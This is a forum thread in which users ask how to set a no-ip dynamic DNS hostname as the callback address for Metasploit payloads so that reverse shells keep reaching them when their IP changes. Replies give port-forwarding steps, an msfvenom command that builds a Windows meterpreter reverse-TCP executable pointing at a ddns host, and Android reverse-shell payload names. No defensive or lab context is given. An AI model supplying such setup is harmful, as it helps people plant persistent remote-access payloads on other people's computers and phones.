Forum Thread: Use Hostname as LHOST in Metasploit

Is there any way to use a hostname (no-ip) as lhost in metasploit payloads? because my ip is not exactly static so i want to use no-ip hostname to make it reachable even if it changed

12 Responses

yes you could i already use it for my beef/metasploit

If you could explain how i will be so gratefull

first thing first you need to download no-ip for linux
install it( it explained how in their website) and setup your no-ip
then you need to forward your port in your router ( for example 4444 port which is defualt)
then just easly set LHOST to what ever your public ip or your no-ip dns is
and set LPORT to what ever you forwarded in router!

Dude there is a windows/meterpreter/reversetcpdns which works fine with dns hostnames but am basically talking about android :/

Do you mean something like this?!?!

$ ./msfvenom -p windows/meterpreter/reversetcp LHOST=illka.ddns.net IP lport=4444 -f exe -o /tmp/mypayload.exe

for android i guess there's a payload android/meterpreter/reverse_https for dns hostnames, though i've never tried it.

as far as opening a port is concerned, some people like me use 3G dongles, so there's no interface from which you can port forward... the solution is to use a virtual router software like this one UPNP PORTMAPPER http://sourceforge.net/projects/upnp-portmapper/files/

Thanks for the reply, my ports are open, am just looking for a payload like the reversetcpdns but for android, because sometimes my ip changes so i want it to connect to my dns so it redirects it to my ip

try these:
android/shell/reverse_https
OR
android/meterpreter/reverse_https

I've found this Pastebin link that has a module for Metasploit that allows DNS to be used instead of an IPv4 address. I haven't tested it out yet, mostly because I'm not sure how to, so, yeah.

Would you mind making a tutorial on this if it works?

Ninja243

After doing some trawling, I found out that the regular reverse tcp module can take DNS instead of an IP address (as seen here.)

Sorry for wasting your time.

Ninja243

why reinventing the wheel?
android/meterpreter/reverse_https works great with no-ip hosts. I'm using it at the moment to test hacking android

if you found the way, I'd like to know.

Share Your Thoughts

  • Hot
  • Active